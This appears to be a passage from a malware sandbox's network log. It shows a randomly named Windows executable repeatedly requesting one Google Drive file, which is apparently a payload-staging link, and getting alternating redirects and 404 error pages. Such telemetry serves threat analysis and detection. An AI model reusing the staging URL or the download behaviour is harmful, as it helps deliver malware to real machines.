                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    35192.168.2.549974142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:24 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:25 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:25 GMT
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-G1sjsUQBpFxkqgdo00w9rA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC5uR8lsNnRvlGgfeXXGdwzVFx5uF-sejHIkH3uXWr-l-67McK6aGeqJ8bUNyBtuk_oMZF5fRihGmA
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:26:25 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 66 64 4e 5f 68 59 4f 79 50 32 75 6c 46 4f 57 69 48 62 56 72 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yfdN_hYOyP2ulFOWiHbVrQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    36192.168.2.549975172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:27 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:28 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:27 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-LPUFyIibe9QQV5035bI0AA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    37192.168.2.549976142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:29 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:30 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:30 GMT
                                                                    Content-Security-Policy: script-src 'nonce-wQUTh5tMvCUH6jfTn9a2gQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC7aVP3m36V3K72LO1xnjhEHY_JxMjWLvId9f9M4AcNUKPUpG5zfVC-3iOGXpCe6tCHanTWSlTq95g
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:26:30 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 4e 2d 68 57 4e 43 75 66 61 59 38 73 71 70 4b 6f 44 39 61 72 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uN-hWNCufaY8sqpKoD9arg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    38192.168.2.549977172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:32 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:33 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:33 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: script-src 'nonce-5Tjn3lSLH6xfvRsE3pgzGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    39192.168.2.549978142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:35 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:36 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:36 GMT
                                                                    Content-Security-Policy: script-src 'nonce-RJ_hvRnWK2g0YmNJJ1PXpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC5xDYlQTK7BKyA1lXs-m8AlqWFk7LeiVOfjAc9BrL8Y85GpZOASDEEJN8t_2kivpJOUez9wttJsNw
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:26:36 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 72 4e 5f 58 59 72 46 77 54 66 51 48 64 36 67 71 6d 44 78 30 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="crN_XYrFwTfQHd6gqmDx0g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    40192.168.2.549979172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:38 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:39 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:38 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy: script-src 'nonce-6qXRuMfTRZXJj8US2aEuaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    41192.168.2.549980142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:41 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:42 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:41 GMT
                                                                    Content-Security-Policy: script-src 'nonce-L9wWrCcO5xZIkLBXMP801A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC79xWUsHjucgOk9UYtEHnk-RcE_R5talxm5kmIUI3Nf1EiFH68-PN-ploq9UEiJ_7unKy2t-kMoxg
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:26:42 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 50 5f 33 62 52 66 4b 4a 76 5f 73 71 34 43 56 6d 58 53 52 75 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZP_3bRfKJv_sq4CVmXSRuQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    42192.168.2.549981172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:43 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
